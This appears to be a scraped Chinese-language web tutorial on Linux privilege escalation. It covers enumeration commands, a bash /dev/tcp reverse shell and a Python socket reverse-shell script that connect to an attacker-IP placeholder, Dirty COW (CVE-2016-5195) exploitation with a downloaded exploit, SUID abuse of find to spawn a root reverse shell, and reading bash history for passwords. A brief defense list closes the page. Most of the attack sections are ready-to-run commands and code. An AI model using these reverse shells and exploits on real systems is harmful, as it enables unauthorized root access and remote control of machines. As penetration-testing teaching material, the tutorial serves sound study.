Linux操作系统提权全面指南<\/h1>

一、Linux提权基础知识<\/h2>

1.1 基本信息收集命令<\/h3>
在开始提权前，需要收集系统基本信息：<\/p>
uname -a  # 查看内核版本<\/span>
<\/span><\/span>id        # 显示用户ID及所属群组<\/span>
<\/span><\/span>pwd       # 显示当前路径<\/span>
<\/span><\/span>dpkg -l   # Debian系查看已安装程序<\/span>
<\/span><\/span>rpm -qa   # RedHat系查看已安装程序<\/span>
<\/span><\/span>cat \/etc\/issue      # 查看发行版信息<\/span>
<\/span><\/span>cat \/etc\/*-release  # 查看发行版详细信息<\/span>
<\/span><\/span><\/code><\/pre>1.2 密码文件分析<\/h3>
Linux系统密码存储在两个关键文件中：<\/p>


\/etc\/passwd<\/code>：存储用户信息，所有用户可读<\/p>

格式：用户名:密码占位符:UID:GID:描述:家目录:登录shell<\/code><\/li>
x<\/code>表示密码hash存储在\/etc\/shadow<\/code>中<\/li>
<\/ul>
<\/li>

\/etc\/shadow<\/code>：存储密码hash，仅root可读写<\/p>

包含加密后的密码hash<\/li>
<\/ul>
<\/li>
<\/ul>
注意<\/strong>：管理员可能重复使用密码，Web后台或数据库密码可能是root密码。<\/p>
二、反弹Shell技术<\/h2>
低权限Shell通常是非交互式的，需要通过反弹Shell获取交互式Shell。<\/p>
2.1 经典反弹Shell方法<\/h3>

攻击机监听：<\/li>
<\/ol>
nc -lvp 53<\/span>
<\/span><\/span><\/code><\/pre>
目标机执行：<\/li>
<\/ol>
bash -i >& \/dev\/tcp\/攻击机IP\/53 0>&1<\/span>
<\/span><\/span><\/code><\/pre>2.2 Python反弹Shell<\/h3>

Python脚本示例(back.py)：<\/li>
<\/ol>
import<\/span> socket,<\/span>subprocess,<\/span>os
<\/span><\/span>s=<\/span>socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM)
<\/span><\/span>s.<\/span>connect(("攻击机IP"<\/span>,53<\/span>))
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),0<\/span>)
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),1<\/span>)
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),2<\/span>)
<\/span><\/span>p=<\/span>subprocess.<\/span>call(["\/bin\/sh"<\/span>,"-i"<\/span>])
<\/span><\/span><\/code><\/pre>
执行方法：<\/li>
<\/ol>
chmod 777<\/span> back.py  # 确保有执行权限<\/span>
<\/span><\/span>python back.py 攻击机IP 53<\/span>
<\/span><\/span><\/code><\/pre>三、内核提权 - 脏牛漏洞(CVE-2016-5195)<\/h2>
3.1 漏洞影响范围<\/h3>
影响Linux kernel >= 2.6.22的所有版本，包括：<\/p>

CentOS7\/RHEL7: 3.10.0-327.36.3.el7<\/li>
CentOS6\/RHEL6: 2.6.32-642.6.2.el6<\/li>
Ubuntu 16.10: 4.8.0-26.28<\/li>
Ubuntu 16.04: 4.4.0-45.66<\/li>
Ubuntu 14.04: 3.13.0-100.147<\/li>
Debian 8: 3.16.36-1+deb8u2<\/li>
Debian 7: 3.2.82-1<\/li>
<\/ul>
3.2 利用步骤<\/h3>

下载exp：<\/li>
<\/ol>
wget https:\/\/github.com\/FireFart\/dirtycow\/blob\/master\/dirty.c
<\/span><\/span><\/code><\/pre>
编译执行：<\/li>
<\/ol>
gcc -pthread dirty.c -o dirty -lcrypt
<\/span><\/span>.\/dirty
<\/span><\/span><\/code><\/pre>
使用生成的新root用户登录<\/li>
<\/ol>
四、SUID提权<\/h2>
4.1 查找SUID文件<\/h3>
find \/ -user root -perm -4000 -print 2>\/dev\/null
<\/span><\/span>find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span>find \/ -user root -perm -4000 -exec ls -ldb {}<\/span> \;<\/span>
<\/span><\/span><\/code><\/pre>4.2 常见SUID提权方法<\/h3>
以find命令为例：<\/p>

确认find有SUID权限：<\/li>
<\/ol>
ls -l \/usr\/bin\/find
<\/span><\/span><\/code><\/pre>
利用find执行命令：<\/li>
<\/ol>
\/usr\/bin\/find pass.txt -exec whoami \;<\/span>
<\/span><\/span><\/code><\/pre>
反弹root shell：<\/li>
<\/ol>
\/usr\/bin\/find pass.txt -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",53));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/span> \;<\/span>
<\/span><\/span><\/code><\/pre>其他常见可提权的SUID程序：nmap、vim、bash、more、less、nano、cp等。<\/p>
五、自动化提权工具<\/h2>
5.1 Linux-exploit-suggester<\/h3>
自动检测系统可能存在的漏洞：<\/p>
.\/linux-exploit-suggester.sh
<\/span><\/span><\/code><\/pre>5.2 Searchsploit<\/h3>
本地搜索exploit-db中的漏洞：<\/p>
searchsploit centos 7<\/span> kernel 3.10
<\/span><\/span><\/code><\/pre>六、其他提权方法<\/h2>
6.1 历史记录提权<\/h3>
查看用户执行过的命令：<\/p>
cat ~\/.bash_history
<\/span><\/span><\/code><\/pre>可能暴露密码的命令如：<\/p>
mysql -u root -p密码
<\/span><\/span><\/code><\/pre>6.2 计划任务提权<\/h3>
检查系统计划任务：<\/p>
ls -l \/etc\/cron*
<\/span><\/span><\/code><\/pre>查找可写的计划任务脚本进行修改。<\/p>
6.3 配置错误提权<\/h3>
使用自动化工具检查：<\/p>

unix-privesc-check<\/li>
linuxprivchecker.py<\/li>
<\/ul>
七、提权流程总结<\/h2>

信息收集：内核版本、安装软件、用户等<\/li>
获取交互式Shell：反弹Shell<\/li>
检查自动化工具建议<\/li>
尝试内核漏洞提权<\/li>
检查SUID文件<\/li>
检查历史记录和计划任务<\/li>
检查密码复用情况<\/li>
使用找到的方法提权<\/li>
<\/ol>
八、防御建议<\/h2>

及时更新系统和内核<\/li>
限制SUID\/SGID文件<\/li>
使用最小权限原则<\/li>
避免密码复用<\/li>
清理命令历史记录<\/li>
定期审计系统配置<\/li>
监控异常进程和网络连接<\/li>
<\/ol>
通过以上方法，可以全面了解Linux系统提权的各种技术和防御措施。实际渗透测试中应根据目标系统具体情况选择最合适的提权方法。<\/p>